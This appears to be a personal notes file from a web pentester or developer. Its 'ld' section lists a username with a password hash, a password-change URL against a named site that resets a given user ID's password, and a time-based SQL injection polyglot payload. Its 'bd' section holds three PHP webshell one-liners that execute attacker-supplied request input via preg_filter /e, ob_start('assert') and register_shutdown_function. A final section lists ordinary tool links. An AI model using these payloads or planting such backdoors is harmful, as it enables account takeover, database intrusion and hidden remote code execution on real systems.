ld:
1.
liuyislogin
589dae7af22d8570c0ee3b36782b1b16

2.
http://me.aaisme.com//index.php/user/updatepassword?uid=8237642&newpass=123456789

3.inject
IF(NOW()=SYSDATE(),SLEEP(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/

bd:
1.
$_REQUEST['pass'] = 'file_put_contents("1.22","22")';
preg_filter('|.*|e', $_REQUEST['pass'], '');

2.
$_REQUEST['pass'] = 'file_put_contents("1.22","22")';
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();

3.
$e = 'assert';
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

other:
1. sublime text theme editor:http://tmtheme-editor.herokuapp.com/#!/editor/theme/Monokai
2. 压测工具http://blog.jobbole.com/87509
3. HTMLPurifier – HTML XSS 防护
4. sublime plugin:http://blog.jobbole.com/96739/
5. mysql参数说明与优化：https://www.xuliangwei.com/xubusi/213.html
6. 浏览器编辑器（php）：data:text/html, <style type%3D"text%2Fcss">%23e{position%3Aabsolute%3Btop%3A0%3Bright%3A0%3Bbottom%3A0%3Bleft%3A0%3B}<%2Fstyle><div id%3D"e"><%2Fdiv><script src%3D"http%3A%2F%2Fd1n0x3qji82z53.cloudfront.net%2Fsrc-min-noconflict%2Face.js" type%3D"text%2Fjavascript" charset%3D"utf-8"><%2Fscript><script>var e%3Dace.edit("e")%3Be.setTheme("ace%2Ftheme%2Fmonokai")%3Be.getSession().setMode("ace%2Fmode%2Fphp")%3B<%2Fscript>
